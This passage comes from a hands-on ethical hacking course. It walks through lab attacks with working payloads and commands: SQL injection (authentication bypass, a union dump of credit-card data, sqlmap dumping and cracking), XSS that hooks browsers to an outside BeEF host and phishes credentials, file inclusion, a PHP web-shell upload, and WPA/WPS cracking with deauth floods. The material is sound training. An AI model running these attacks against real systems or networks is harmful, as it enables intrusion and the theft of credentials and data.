Let’s examine the login page and the underlying source code

mysql_select_db('webappdb');

$user = $_POST['user']; // unsanitized

$pass = $_POST['pass']; // unsanitized
$query="select * from users where name = '$user' and password = '$pass' ";
$queryN = mysql_query($query) or die(mysql_error());
if (mysql_num_rows($queryN) == 1)
{
$resultN = mysql_fetch_assoc($queryN);
$_SESSION['user'] = $_POST['user'];
header("location:admin.php");
}
else // user rejected
{
echo "<br /><h1>Wrong Username or Password</h1>";
echo '<META HTTP-EQUIV="Refresh" CONTENT="2;URL=admin.php">';
}

Notice how the $user and $pass POST variables are not sanitized in any way, and are then used
as part of a SQL statement.
We have a web application running which requires username and password for authentication.
The web application is at http://192.168.2.6.

TRANCHULAS | www.tranchulas.com 193

Hands-On Ethical Hacking and Penetration Testing Training Course

Click on Login/Register to web form. Now we will try to bypass authentication using SQL injection.

We have input HI’ or 1=1 - - and password field is empty. When we press login

We have successfully logged in as admin. The reason it logged in as admin because admin was
the first account entry in the database. Underlying query would look like this
Select * from Table where username = ‘HI’ or 1=1 - - AND password =’ ’
- - is used for comments in SQL so the password part is commented. This is a simple vulnerability
present in many web applications.

Data Extraction

Another example is viewing account details. We can use the same injection string to view all of
the data. Go to Injection Attacks -> SQLi Extract Data -> User Info

TRANCHULAS | www.tranchulas.com 194

Hands-On Ethical Hacking and Penetration Testing Training Course

We have input HI’ or 1=1 - - in both username and password. Click View Account Details

TRANCHULAS | www.tranchulas.com 195

Hands-On Ethical Hacking and Penetration Testing Training Course

We have got a dump of all the accounts data.

SQL Injection (Union)

Union based SQL injection is used to find number of columns in the resultant table that is being
used by the query. To test this vulnerability go to the User Info page in the web application.

TRANCHULAS | www.tranchulas.com 196

Hands-On Ethical Hacking and Penetration Testing Training Course

User will enter his/her credentials and details will be shown. We will now try to find the number
of columns in the underlying table. We will start with the following query
‘ union select null,null – (Make sure to put space after --)

As we can see that we have an error of different number of columns. We will continue adding
null statements until the number of columns are equal to the input we have supplied. In this case
we have supplied 7 null statements. Following result is obtained:

Now we will change the null statements with numbers. The query will be:
‘ union select 1,2,3,4,5,6,7 –

TRANCHULAS | www.tranchulas.com 197

Hands-On Ethical Hacking and Penetration Testing Training Course

Now we are able to map the entries with the columns. We can use this vulnerability to extract
information. For example we can use the query
union select 1,@@version,3,4,5,6,7 -- to get the DB version

We can use commands like user() to get the username. Various other commands can also be
used.

Let’s try another query. There is table named credit_cards in this application. We will try to get
data using the same method. We will use the following query: ' union select
ccid,ccnumber,ccv,expiration,null,null,null from credit_cards --

TRANCHULAS | www.tranchulas.com 198

Hands-On Ethical Hacking and Penetration Testing Training Course

We have got all the entries in the table. In short, we are dumping database content.

SQLMap

The whole process of SQL injection can also be automated using this tool. SQLmap is an open
source penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers. It comes with a powerful detection engine,
many niche features for the ultimate penetration tester and a broad range of switches lasting
from database fingerprinting, over data fetching from the database, to accessing the underlying
file system and executing commands on the operating system.

Browse to http://192.168.2.7

Click on test. In the URL, you will see that data is being passed using get parameter.

TRANCHULAS | www.tranchulas.com 199

Hands-On Ethical Hacking and Penetration Testing Training Course

Let us change the value of id from 1 to 2

TRANCHULAS | www.tranchulas.com 200

Hands-On Ethical Hacking and Penetration Testing Training Course

Let check if it is vulnerable to SQL injection by inserting ‘ in id.

This error implies that the parameter may be vulnerable to SQL injection. We will now use
SQLmap to exploit it

root@kali:~# sqlmap -u http://192.168.2.7/cat.php?id=2 --dbs

--dbs parameter lists the databases

[02:16:35] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[02:16:35] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] photoblog

[02:16:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.7'

Two databases have been listed. We will try to get the tables of photoblog database

root@kali:~# sqlmap -u http://192.168.2.7/cat.php?id=2 -D photoblog --tables

--tables parameter lists the tables of the selected database

TRANCHULAS | www.tranchulas.com 201

Hands-On Ethical Hacking and Penetration Testing Training Course

[02:18:05] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[02:18:05] [INFO] fetching tables for database: 'photoblog'
Database: photoblog
[3 tables]
+------------+
| categories |
| pictures |
| users |
+------------+

We are interested in the users table. So, next step is to get all the data of the users table

root@kali:~# sqlmap -u http://192.168.2.7/cat.php?id=2 -D photoblog -T users --dump-all

It will ask you to crack hashes of passwords found. Select Yes. We will get the following results

Database: photoblog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password |
+----+-------+---------------------------------------------+
| 1 | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

We have got the password and SQLmap has cracked the hash for us as well. Lets try these
credentials on http://192.168.2.7/admin/login.php

TRANCHULAS | www.tranchulas.com 202

Hands-On Ethical Hacking and Penetration Testing Training Course

Cross Site Scripting (XSS)

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web
applications. XSS enables attackers to inject client-side script into Web pages viewed by other
users. A cross-site scripting vulnerability may be used by attackers to bypass access controls.
Reflected XSS
Reflected XSS occurs when user input is immediately returned by a web application in an error
message, search result, or any other response that includes some or all of the input provided by
the user as part of the request, without that data being made safe to render in the browser, and
without permanently storing the user provided data. In some cases, the user provided data may
never even leave the browser.
Stored XSS
Stored XSS generally occurs when user input is stored on the target server, such as in a database,
in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored
data from the web application without that data being made safe to render in the browser.

Reflected XSS

Go to Cross Site Scripting -> Reflected (First Order) -> DNS Lookup and inject the following
string:
<script>alert(“XSS”);</script>

TRANCHULAS | www.tranchulas.com 203

Hands-On Ethical Hacking and Penetration Testing Training Course

You can see that the JavaScript code is executed. Another example is that if we want to get the
cookie value using alert(document.cookie).
<script>alert(document.cookies);<script>

TRANCHULAS | www.tranchulas.com 204

Hands-On Ethical Hacking and Penetration Testing Training Course

Stored (Persistent) XSS

Go to Cross Site Scripting -> Persistent -> Add to your Blog

Inject the script in the blog section and press Save blog entry.

When we press the button the blog entry is saved in the database. We also get a prompt.

TRANCHULAS | www.tranchulas.com 205

Hands-On Ethical Hacking and Penetration Testing Training Course

Now navigate to the view blogs area. As soon as the page loads XSS is executed. This shows the
presence of stored XSS.

This popup will generate each time the page is loaded. This happens because the XSS script is
stored in the database and is being executed once viewed on the page.

iFrame Injection

Now that we have identified XSS. We can inject iFrames to redirect the victim to malicious pages.

TRANCHULAS | www.tranchulas.com 206

Hands-On Ethical Hacking and Penetration Testing Training Course

When we view all the blogs we get the result

BeEF

The Browser Exploitation framework allows penetration tester to access the security posture of
a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF
looks past the hardened network perimeter and client system, and examines exploitability within
the context of the one open door: the web browser. BeEF will hook one or more web browsers
and use them as beachheads for launching directed command modules and further attacks
against the system from within the browser context. [6]

TRANCHULAS | www.tranchulas.com 207

Hands-On Ethical Hacking and Penetration Testing Training Course

If we have found cross site scripting in our target web application, we can use BeEF to further
exploit the target. To start BeEF on kali Linux type the following command:

root@kali:~# beef-xss

The framework will initiate. You will get a hook URL

Copy the UI URL and paste it in browser

Username: beef and password: beef

You will be presented with an interface. Copy the sample links are that present on the page. IF
you paste it you will see a similar URL

TRANCHULAS | www.tranchulas.com 208

Hands-On Ethical Hacking and Penetration Testing Training Course

Link1: http://some_ip:3000/demos/basic.html
Link2: http://some_ip:3000/demos/butcher/index.html
These are some sample links already created so that you can start your attack. Send these link to
the attacker. When the attacker opens the link on the browser you will get a hook. If the web
application is vulnerable to XSS we can craft a script that will execute and hook the browser as
well. An example is:
<script src=http://192.168.3.107:3000/hook.js>alert(“Successful”);</script>

Execute this script in the vulnerable field to get a hook. As soon as we execute it we will see a
new entry.

TRANCHULAS | www.tranchulas.com 209

Hands-On Ethical Hacking and Penetration Testing Training Course

With a browser hooked there are various modules that can be used to exploit the end user.

One of the examples of attack is Petty Theft under Social Engineering.

When we execute the attack. Victim will see a dialog of Facebook session expired. Remember the
IP in custom logo should be same as your BeEF. As soon as we execute the attack the dialog box
appears.

TRANCHULAS | www.tranchulas.com 210

Hands-On Ethical Hacking and Penetration Testing Training Course

When we enter the credentials. They are also captured. We have got the username and
password.

File Inclusions

Local File Inclusion

Local File Inclusion (also known as LFI) is the process of including files, that are already locally
present on the server, through the exploiting of vulnerable inclusion procedures implemented in
the application. This vulnerability occurs, for example, when a page receives, as input, the path
to the file that has to be included and this input is not properly sanitized, allowing directory
traversal characters (such as dot-dot-slash) to be injected. Although most examples point to
vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such
as JSP, ASP and others.

We will browse to any page in our vulnerable web application

TRANCHULAS | www.tranchulas.com 211

Hands-On Ethical Hacking and Penetration Testing Training Course

As we see in the URL that page is called via a parameter

http://192.168.2.6/index.php?page=login.php

If we enter some different value we will be able to get different results. E.g we enter dns-
lookup.php and we are redirected to another page

TRANCHULAS | www.tranchulas.com 212

Hands-On Ethical Hacking and Penetration Testing Training Course

Similarly if a page is not found we will get an error

We will try to access server related files and see if they are accessible

As we can see that we can view the contents of the file. Similarly we can query other files like
/etc/profile

TRANCHULAS | www.tranchulas.com 213

Hands-On Ethical Hacking and Penetration Testing Training Course

Remote File Inclusion

File inclusion vulnerability is a type of vulnerability most often found on websites. It allows an
attacker to include a file, usually through a script on the web server. The vulnerability occurs due
to the use of user-supplied input without proper validation. This can lead to something as
minimal as outputting the contents of the file or more serious events such as:
• Code execution on the web server
• Code execution on the client-side such as JavaScript which can lead to other attacks such
as cross site scripting (XSS)
• Denial of service (DoS)
• Data theft/manipulation

We will try to include remote files from various websites. Using the textviewer feature in our
application

Capturing the request in burp suite

TRANCHULAS | www.tranchulas.com 214

Hands-On Ethical Hacking and Penetration Testing Training Course

POST /index.php?page=text-file-viewer.php HTTP/1.1

Host: 192.168.2.6

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.2.6/index.php?page=text-file-viewer.php

Cookie: PHPSESSID=amd6v7n5cp0mjjacnvati1mae0; showhints=0

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 109

textfile=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fwww.textfiles.com%2Fhacking%2Fbackdoor.txt&text-file-viewer-
php-submit-button=View+File

We will change the text file parameter to our own file http://www.textfiles.com/100/ad.txt. We
have got the following output

TRANCHULAS | www.tranchulas.com 215

Hands-On Ethical Hacking and Penetration Testing Training Course

Remote File Upload

There are various applications that allow us to upload different files. If proper security checks are
not implemented, then we can upload malicious files on the server. Go to
http://192.168.2.5/vulnerabilities/upload

TRANCHULAS | www.tranchulas.com 216

Hands-On Ethical Hacking and Penetration Testing Training Course

We download an php shell and try to upload it on the server. We download a shell from
https://r57.gen.tr/

If we try to upload it to the application we get an error.

We will change the extension of php shell from .php to .png.php

TRANCHULAS | www.tranchulas.com 217

Hands-On Ethical Hacking and Penetration Testing Training Course

Now the file will upload successfully.

Task: Your task is to find where the file was uploaded and browse to that file using the methods
we have learned in this section.

TRANCHULAS | www.tranchulas.com 218

Hands-On Ethical Hacking and Penetration Testing Training Course

Module 11: Wireless Penetration

Testing

TRANCHULAS | www.tranchulas.com 219

Hands-On Ethical Hacking and Penetration Testing Training Course

Hacking Wireless with Wi-Fi Pineapple Nano

The WiFi Pineapple Nano is the latest generation wireless network auditing tool from Hak5. With
its custom, purpose built hardware and software, the WiFi Pineapple enable users to quickly and
easily deploy advanced attacks.

Setup
First we need to setup our pineapple device. Follow the following steps:
1. Download the latest firmware for WiFi pineapple from
https://www.wifipineapple.com/downloads/nano/latest .

TRANCHULAS | www.tranchulas.com 220

Hands-On Ethical Hacking and Penetration Testing Training Course

2. Plug your NANO into the PC using the USB Y cable. You need to connect it to your Kali
virtual machine.

3. Wait for LED to become solid blue then make sure Ethernet interface is connected.

4. Browse to 172.16.42.1:1471. Press Continue

TRANCHULAS | www.tranchulas.com 221

Hands-On Ethical Hacking and Penetration Testing Training Course

5. You will be prompted to press the Reset button. Press the Reset button to disable WiFi.

6. Upgrade the firmware. Use the file you downloaded previously. (If firmware is the
latest, this page will not be shown). Firmware can be downloaded from
https://www.wifipineapple.com/downloads/nano/latest

7. Now setup the credentials. Enter the required information

TRANCHULAS | www.tranchulas.com 222

Hands-On Ethical Hacking and Penetration Testing Training Course

8. Once the setup is complete you will be redirected. Login using the credentials you set

TRANCHULAS | www.tranchulas.com 223

Hands-On Ethical Hacking and Penetration Testing Training Course

Enabling Internet on WiFi Pineapple NANO

1. Disconnect NANO from Kali Linux.

2. Download the script from http://wifipineapple.com/wp6.sh

root@kali:~# wget wifipineapple.com/wp6.sh

--2016-09-28 14:24:55-- http://wifipineapple.com/wp6.sh
Resolving wifipineapple.com (wifipineapple.com)... 54.149.31.76
Connecting to wifipineapple.com (wifipineapple.com)|54.149.31.76|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.wifipineapple.com/wp6.sh [following]
--2016-09-28 14:24:57-- http://www.wifipineapple.com/wp6.sh
Resolving www.wifipineapple.com (www.wifipineapple.com)... 74.125.133.121,
2a00:1450:400c:c09::79
Connecting to www.wifipineapple.com
(www.wifipineapple.com)|74.125.133.121|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://www.wifipineapple.com/wp6.sh [following]
--2016-09-28 14:24:58-- https://www.wifipineapple.com/wp6.sh
Connecting to www.wifipineapple.com
(www.wifipineapple.com)|74.125.133.121|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/octet-stream]
Saving to: ‘wp6.sh’

TRANCHULAS | www.tranchulas.com 224

Hands-On Ethical Hacking and Penetration Testing Training Course

wp6.sh [ <=> ] 15.26K 51.0KB/s in 0.3s

2016-09-28 14:25:01 (51.0 KB/s) - ‘wp6.sh’ saved [15622]

3. Now run the following commands

root@kali:~# chmod a+x wp6.sh

4. Now execute the script. Select Guided Setup

root@kali:~# ./wp6.sh
Saved Settings: Share Internet connection from wlan0
to WiFi Pineapple at eth1 through default gateway 192.168.1.1
Since this is the first time running the WP6 Internet Connection Sharing
script, Guided setup is recommended to save initial configuration.
Subsequent sessions may be quickly connected using saved settings.
[C]onnect using saved settings
[G]uided setup (recommended)
[M]anual setup
[A]dvanced IP settings
[Q]uit

Step 1 of 3: Select Default Gateway

Default gateway reported as 192.168.3.1
Use the above reported default gateway? [Y/n]? y

Step 2 of 3: Select Internet Interface

Internet interface reported as eth0
Use the above reported Internet interface? [Y/n]? y

Step 3 of 3: Select WiFi Pineapple Interface

Please connect the WiFi Pineapple to this computer.
........[Checking]
Detected WiFi Pineapple on interface eth1
Use the above detected WiFi Pineapple interface? [Y/n]? y

Settings saved.
Saved Settings: Share Internet connection from eth0
to WiFi Pineapple at eth1 through default gateway 192.168.3.1

5. Re execute the Script, this time select Connect using Saved Settings

TRANCHULAS | www.tranchulas.com 225

Hands-On Ethical Hacking and Penetration Testing Training Course

Now browse to http://172.16.42.1:1471 from your Kali Machine using a web browser.
Login using the credentials you set previously.

Connecting Using SSH:

Once the WiFi Pineapple is configured you can connect to it using SSH. To connect type the
following command in terminal:

root@kali:~ ssh [email protected]

The authenticity of host '172.16.42.1 (172.16.42.1)' can't be established.
RSA key fingerprint is SHA256:5DHGHGo9HavNDDHVMmKA+tyKSiL8/lKqAWnPP1TgIgs.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.16.42.1' (RSA) to the list of known hosts.
[email protected]'s password:

Your password would be the same as you did in configuration process.

TRANCHULAS | www.tranchulas.com 226

Hands-On Ethical Hacking and Penetration Testing Training Course

You can now run various commands like iwconfig etc.

root@Pineapple:~# iwconfig
lo no wireless extensions.

wlan1 IEEE 802.11bgn ESSID:off/any

Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

wlan0-1 IEEE 802.11bgn Mode:Master Tx-Power=17 dBm

RTS thr:off Fragment thr:off
Power Management:off

wlan0 IEEE 802.11bgn Mode:Master Tx-Power=17 dBm

RTS thr:off Fragment thr:off
Power Management:off

eth0 no wireless extensions.

br-lan no wireless extensions

TRANCHULAS | www.tranchulas.com 227

Hands-On Ethical Hacking and Penetration Testing Training Course

Capture WPA/WPA2 Handshake

To perform a particular attack we need to install certain modules for WiFi Pineapple. To perform
this attack we need to install Site Survey module. To install new modules go to Modules ->
Manage Modules

Click on Get Modules from WiFiPineapple.com. We need to install Site Survey module

Click the Install button. Install it to Internal Storage

After installation, the module will appear under the Modules section

TRANCHULAS | www.tranchulas.com 228

Hands-On Ethical Hacking and Penetration Testing Training Course

Install dependencies by clicking on Not Installed button

Install it on internal storage

TRANCHULAS | www.tranchulas.com 229

Hands-On Ethical Hacking and Penetration Testing Training Course

Before scanning we need to put our interface into monitor mode. Login into WiFi Pineapple using
SSH.

root@kali:~# ssh [email protected]

[email protected]'s password:

View the network interfaces

root@Pineapple:~# iwconfig
lo no wireless extensions.

wlan1 IEEE 802.11bgn ESSID:off/any

Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

wlan0-1 IEEE 802.11bgn Mode:Master Tx-Power=17 dBm

RTS thr:off Fragment thr:off
Power Management:off

wlan0 IEEE 802.11bgn Mode:Master Tx-Power=17 dBm

RTS thr:off Fragment thr:off
Power Management:off

TRANCHULAS | www.tranchulas.com 230

Hands-On Ethical Hacking and Penetration Testing Training Course

eth0 no wireless extensions.

br-lan no wireless extensions.

We need to put wlan1 into monitor mode

root@Pineapple:~# airmon-ng start wlan1

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

6705 root 1376 S grep

wpa_action\|wpa_supplicant\|wpa_cli\|dhclient\|ifplugd\|dhcdbd\|dhcpcd\|udhcpc\|

PHY Interface Driver Chipset

phy0 wlan0 ath9k Not pci, usb, or sdio

phy0 wlan0-1 ath9k Not pci, usb, or sdio
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)

Now we can go to our web interface and start the scan. Refresh the page and click on Scan

You will get a list of access points (APs). We want to capture the handshake of please_hack_me

TRANCHULAS | www.tranchulas.com 231

Hands-On Ethical Hacking and Penetration Testing Training Course

Click on Capture

Now click on Deauth. We will get it in the Running Processes

Scroll down to Captures.

Keep pressing the refresh capture button after sometime. It will take some time to capture the
handshake. Once the WPA Handshake value is Yes. You can stop the attacks. Click on Stop
Deauth and Stop Capture.
We can download the file and brute force it to get the password of the access point. Click on
Download button to download it. It will be downloaded on your Kali machine.

Right click and extract here

TRANCHULAS | www.tranchulas.com 232

Hands-On Ethical Hacking and Penetration Testing Training Course

We now have a .cap file. We will now try to crack it using aircrack-ng file. First we need a list of
passwords that we will try to bruteforce. There are various lists of common passwords available
online. You can also create your own

Type the following command to start the cracking process using the passwords present in our list

root@kali:~/Documents# aircrack-ng -w password.lst capture_1475139153-01.cap

Opening capture_1475139153-01.cap
Read 20835 packets.

# BSSID ESSID Encryption

1 64:70:02:4E:70:5B please_hack_me WPA (1 handshake)

Choosing first network as target.

TRANCHULAS | www.tranchulas.com 233

Hands-On Ethical Hacking and Penetration Testing Training Course

Opening capture_1475139153-01.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc4

[00:00:00] 4/4 keys tested (984.25 k/s)

Time left: 0 seconds 100.00%

KEY FOUND! [ testing123 ]

Master Key : E1 50 16 E9 D9 98 A7 CB 2F B0 65 1C 81 AC EA A1
A3 30 3C B5 47 CF A0 A3 E7 86 73 C6 AF FD 60 B5

Transient Key : 1F 8A D8 4C 16 70 10 EE 0E 0C CA B5 5A 73 3E 02
A7 FA A0 A5 BB 7F CC AD D8 D5 F0 F5 4A 94 F8 BA
CD 84 EB 63 50 A6 E8 EA 0D 77 49 BB B0 AC 75 30
27 BA 00 FD 78 2C 33 07 6D C3 6F 8D BD 99 6B 3C

EAPOL HMAC : 3B 09 53 87 A7 29 CC D5 D9 E0 72 45 F1 A3 11 02

We can see that key is successfully found. The password is testing123

TRANCHULAS | www.tranchulas.com 234

Hands-On Ethical Hacking and Penetration Testing Training Course

WPS Brute Force

We can brute force WPS using WiFi pineapple module. First go to Modules -> Manage Modules

Click on Get Modules from WiFiPineapple.com. Install wps module

TRANCHULAS | www.tranchulas.com 235

Hands-On Ethical Hacking and Penetration Testing Training Course

Install to internal storage

The newly installed module will appear in the module section. Install Dependencies by clicking
on Not installed

Install them in internal storage

TRANCHULAS | www.tranchulas.com 236

Hands-On Ethical Hacking and Penetration Testing Training Course

First we need to start a monitor interface on wlan1. Click on Interfaces. Select wlan1

Click on Start monitor. A monitor interface will appear

Click on Scan Results and then press Scan button

A list of Access Points will be generated

TRANCHULAS | www.tranchulas.com 237

Hands-On Ethical Hacking and Penetration Testing Training Course

Click on the SSID that you want to attack. We will be attacking please_hack_me

As soon as you click its information will be present in the Options section

TRANCHULAS | www.tranchulas.com 238

Hands-On Ethical Hacking and Penetration Testing Training Course

Press Start. You will see a running process

It will take time to finish the process. You can stop it by clicking on Stop. Click on Stop Monitor
before you go to the next attack.

Capturing Traffic

In this section, we will try to capture user traffic using DWall module. First go to Networking

Uncheck Hide Open AP

Click on Update Access Point. You may need to disconnect and then reconnect pineapple to
your Kali virtual machine and run the wp6.sh script again.

TRANCHULAS | www.tranchulas.com 239

Hands-On Ethical Hacking and Penetration Testing Training Course

Now We need to install DWall module. Go to Modules -> Manage Modules. Click on Get
Modules from WiFiPineapple.com and select DWall. Install the module

Go to DWall module

Click on Enable. Then click on Start Listening. Now we will see an open access point.

Once user connects and starts browsing. For example user goes to tranchulas.com. We will
capture all the traffic and related data

TRANCHULAS | www.tranchulas.com 240

Hands-On Ethical Hacking and Penetration Testing Training Course

Airodump-ng
Airodump-ng is used for packet capture of raw 802.11 frames and is particularly suitable for
collecting WEP IVs (Initialization Vectors) for later use with Aircrack-ng. If you have a GPS
receiver connected to the computer , Airodump-ng is capable of logging the coordinates of the
found APs.
Usage
Before running Airodump-ng, start the Airmon-ng script to list the detected
wirelessinterfaces.

Usage: airodump-ng <options> <interface>[,<interface>,...] Options:

--ivs: Save only captured IVs
--gpsd: Use GPSd
--write <prefix>: Dump file prefix
-w: same as --write
--beacons: Record all beacons in dump file
--update <secs>: Display update delay in seconds

Filter options:

TRANCHULAS | www.tranchulas.com 241

Hands-On Ethical Hacking and Penetration Testing Training Course

By default, airodump-ng hop on 2.4Ghz channels.

You can make it capture on other/specific channel(s) by using:

Aireplay-ng
Aireplay-ng is primarily used to generate or accelerate traffic for the later use with Aircrack-
ng (for cracking the WEP and WP A-PSK keys). Aireplay-ng supports various attacks such as
deauthentication (for the purpose of capturing WP A handshake data), fakeauthentication,
Interactive packet replay , hand-crafted ARP request injection and ARP-request re injection.
These are the attack names and their corresponding “numbers”:

• Attack 0: Deauthentication
• Attack 1: Fake authentication
• Attack 2: Interactive packet replay
• Attack 3: ARP request replay attack
• Attack 4: KoreK chopchop attack
• Attack 5: Fragmentation at tack
• Attack 9: Injection test
Usage
This section provides a general usage overview . Not all options apply to all attacks. See
the command options of the specific attack for the relevant details.
Usage: aireplay-ng <options> <replay interface>
For all the at tacks except deauthentication and fake authentication you may use the
following filters to limit the packets which are presented to the particular attack. The most

TRANCHULAS | www.tranchulas.com 242

Hands-On Ethical Hacking and Penetration Testing Training Course

commonly used filter option is “- b” - to single out a specific AP . Typically , only the “-b”
option is used.
Filter options:

• -b BSSID : MAC address, Access Point

• -d dmac : MAC address, Destination
• -s smac : MAC address, Source
• -m len : minimum packet length
• -n len : maximum packet length
• -u type : frame control, type field
• -v suroot@kali : frame control, suroot@kaliype field
• -t tods : frame control, T o DS bit
• -f fromds : frame control, From DS bit
• -w iswep : frame control, WEP bit
When replaying (injecting) packets, the following options apply:
Replay options:

• -x nbpps : number of packets per second

• -p fctrl : set frame control word (hex)
• -a BSSID : set Access Point MAC address
• -c dmac : set Destination MAC address
• -h smac : set Source MAC address
• -e essid : fakeauth at tack : set target AP SSID
• -j : arpreplay attack : inject FromDS pkts
• -g value : change ring buffer size (default: 8)
• -k IP : set destination IP in fragments
• -l IP : set source IP in fragments
• -o npckts : number of packets per burst (-1)
• -q sec : seconds between keep-alives (-1)
• -y prga : keystream for shared key auth
The Aireplay attacks can oroot@kaliain packets to replay from two sources. The first source
is a live flow of packets from your wireless card. The second source is from a pre-captured a
pcap file. Standard Pcap format (Packet CAPture, associated with the libpcap library
http://www. tcpdump.org) is recognized by most commercial and open-source traffic capture
and analysis tools. Reading from a file is an often overlooked feature of Aireplay-ng. This
allows you read packets from other capture sessions.
Source options:

• -i iface : capture packets from this interface

TRANCHULAS | www.tranchulas.com 243
Hands-On Ethical Hacking and Penetration Testing Training Course

• -r file : extract packets from this pcap file

You can specify the attack mode using the following syntax: Attack modes (Numbers can
still be used):

• --deauth count : deauthenticate 1 or all stations (-0)

• --fakeauth delay : fak e authentication with AP (-1)
• --interactive : interactive frame selection (-2)
• --arpreplay : standard ARP-request replay (-3)
• --chopchop : decrypt/chopchop WEP packet (-4)
• --fragment : generates valid keystream (-5)
• --test : injection test (-9)

Demo Attack

For this section you will need an external WiFi adapter. We are using Alfa AWUS036NEH for these
tests.

First we need to connect our external WiFi card to our Virtual Machine.

TRANCHULAS | www.tranchulas.com 244

Hands-On Ethical Hacking and Penetration Testing Training Course

Go to terminal. Type iwconfig

root@kali:~# iwconfig
wlan0 IEEE 802.11bgn ESSID:"Tranchulas-Cisco"
Mode:Managed Frequency:2.412 GHz Access Point: 00:23:69:19:3A:57
Bit Rate=1 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=70/70 Signal level=-19 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:1 Invalid misc:9 Missed beacon:0

lo no wireless extensions.

eth0 no wireless extensions.

You should have wlan0 interface. Now we need to put the interface in monitor mode.

root@kali:~# airmon-ng start wlan0

Found 4 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
593 NetworkManager
771 dhclient
1031 wpa_supplicant
3732 dhclient

TRANCHULAS | www.tranchulas.com 245

Hands-On Ethical Hacking and Penetration Testing Training Course

PHY Interface Driver Chipset

phy0 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

(mac80211 station mode vif disabled for [phy0]wlan0)

Type iwconfig again. Now we should see wlan0mon interface

root@kali:~# iwconfig
wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions.

eth0 no wireless extensions.

To list all Access Points type airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:23:69:19:3A:57 -22 18 0 0 1 54e WPA2 CCMP PSK Tranchulas-Cisco

34:BF:90:D1:8E:08 -30 8 0 0 12 54e WPA2 CCMP PSK 04F2G_d18e08
D4:F9:A1:9F:E4:72 -35 12 55 3 1 54e. WPA2 CCMP PSK Tranchulas 2
64:70:02:4E:70:5B -35 15 0 0 11 54e WPA2 CCMP PSK please_hack_me

Press Ctrl + c if you want to exit.

We are interested in please_hack_me access point with BSSID of 64:70:02:4E:70:5B. We will now
focus on this AP.

root@kaliL!# airodump-ng wlan0mon --bssid 64:70:02:4E:70:5B -c 11 --write cracking_wifi

-c is the channel, - -bssid is the BSSID of the AP and - - write flag writes all the data in cracking_wifi
file. It will start capturing the data and try to capture the handshake.

TRANCHULAS | www.tranchulas.com 246

Hands-On Ethical Hacking and Penetration Testing Training Course

At the same time we need to launch a deauth attack to disconnect any clients connected to this
AP. This will help us in capturing the handshake once the clients reconnect.

root@kali:~# aireplay-ng --deauth 100 -a 64:70:02:4E:70:5B wlan0mon

12:59:18 Waiting for beacon frame (BSSID: 64:70:02:4E:70:5B) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
12:59:18 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:19 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:19 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:20 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:20 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
12:59:21 Sending DeAuth to broadcast -- BSSID: [64:70:02:4E:70:5B]
